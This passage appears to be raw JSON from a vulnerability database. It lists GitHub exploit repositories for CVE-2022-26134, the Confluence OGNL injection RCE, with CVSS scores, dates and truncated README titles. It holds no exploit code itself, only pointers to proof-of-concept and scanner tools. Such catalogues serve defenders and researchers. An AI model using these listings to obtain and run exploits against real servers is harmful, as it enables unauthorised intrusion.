"obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-10T08:52:10", "id": "DBAD59E8-9E48-5D54-92A0-AAD5B57C39F6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-29T02:55:43", "description": "# POC - Atlassian Confluence OGNL Injection Remote Code Executio...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-24T10:33:13", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-27T22:50:35", "id": "20BFC1D4-CB1E-51CF-82D8-E4258142BB69", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-22T22:58:01", "description": "# CVE-2022-26134\n \n -u URL, --url URL \u76ee\u6807url\n \n -c COMM...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T02:11:58", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-22T17:49:52", "id": "796BB1A4-EF64-57CA-862E-996A72F2FBE5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-14T15:15:41", "description": "## This is a Script to find vulnerable servers to CVE-2022-26134...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T05:34:09", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-14T14:48:57", "id": "F42BF447-C1A3-5795-8343-D71F096AFF52", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-19T15:47:44", "description": "<h1 align=\"center\">\u300c\ud83d\udca5\u300dCVE-2022-26134</h1>\n\n<p align=\"center\"><im...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-19T13:50:22", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-19T15:02:14", "id": "5255E938-0B92-5E2C-B1A4-21B2445C29AF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:57:53", "description": "# BotCon\nAttlasian Confluence Un-Authenticated Remote Code Execu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T18:07:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-11T11:22:55", "id": "0989C9B1-62A8-505A-B12F-586D7FAADEEE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-23T10:59:01", "description": "# CVE-2022-26134 by 1vere$k\nJust simple PoC for the Atlassian Ji...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-15T10:06:15", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-23T03:35:08", "id": "C8C50EDF-39F5-5103-AC79-A8C7FA6A4B60", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-21T04:58:03", "description": "# Confluence Pre-Auth Remote Code Execution via OGNL Injection (...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-12T20:24:36", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-12T20:24:48", "id": "3F29DC5F-237B-53EB-B173-8F4751FE66A7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-06T09:08:50", "description": "<h1 align=\"center\">Serein | \u8eab\u5904\u843d\u96e8\u7684\u9ec4\u660f</h1> \n<p align=\"center\"><im...", "cvss3": {}, "published": "2022-05-31T07:44:01", "type": "githubexploit", "title": "Exploit for CVE-2022-26134", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-06T09:02:20", "id": "C6912636-2CB2-54CA-9F78-1A4FF04CA119", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-07-01T20:46:11", "description": "# CVE-2022-26134 - conFLU\n\nPoC for exploiting CVE-2022-26134 on ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-29T17:33:18", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-29T17:34:07", "id": "34793974-B475-5BC4-BAAA-64FE57D0B3D9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-29T17:24:22", "description": "# CVE-2022-26134\r\nCVE-2022-26134 - Confluence Pre-Auth RCE | OGN...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T19:24:30", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-29T16:13:13", "id": "28E888C4-78E3-5F8D-B316-AB42FED892F9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-23T23:00:01", "description": "# Atlassian Confluence OGNL Injection POC Vulnerability CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-06T01:27:21", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-23T16:53:31", "id": "2B2A8A69-A893-5E85-8B02-6D8A77B54853", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T20:00:27", "description": "# CVE-2022-26134\n\n\n# links\n\n https://confluence.atlassian.com...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T08:01:49", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-14T18:47:54", "id": "2D36D631-FAE1-5508-9C60-F4B807EC6C47", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-27T05:03:07", "description": "# Through the Wire\n\nThrough the Wire is a proof of concept explo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T13:59:19", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-27T01:07:46", "id": "3CD4239D-A6D3-5B3A-A18E-D5B99C51B5E5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T20:01:31", "description": "# Confluence RCE [CVE-2022-26134] Exploit Detection\n\n## Pre-requ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T13:52:14", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T09:11:48", "id": "26F41B84-2AAF-5C6C-BE06-461FF65C6D03", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:59:36", "description": "# CVE-2022-26134 PoC\n\nConfluence Server and Data Center - CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T10:44:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-09T12:17:21", "id": "423DF4D5-60AF-5663-B196-2A67DD13D226", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:59:38", "description": "# Confluence RCE [CVE-2022-26134] Exploit Detection\n\n## Pre-requ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T13:52:14", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T09:11:48", "id": "D22CFFB0-30A6-5227-8048-C9C028070BD3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-23T16:54:55", "description": "# CVE-2022-26134\nConfluence OGNL expression injected RCE(CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T11:16:28", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-23T11:23:06", "id": "EA88FA45-8CE7-5D7D-8E6C-B04F8392F7EB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-05T07:59:49", "description": "# CVE-2022-26134\r\n\u8fdc\u7a0b\u653b\u51fb\u8005\u5728\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u60c5\u51b5\u4e0b\uff0c\u53ef\u6784\u9020OGNL\u8868\u8fbe\u5f0f\u8fdb\u884c\u6ce8\u5165\uff0c\u5b9e\u73b0\u5728Confluence ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-23T14:38:11", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-05T06:45:59", "id": "F0CF90CD-DC6E-5F0F-AD61-5E1694700F32", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-30T05:01:42", "description": "# CVE-2022-26134\nAtlassian Conflue...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T06:57:02", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T14:41:51", "id": "18A205C9-C2EE-55CC-9BFD-4054390F94E9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:58:56", "description": "# CVE-2022-26134 POC\n\n## Description\n```\nIn affected versions of...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T10:36:11", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-08T05:09:06", "id": 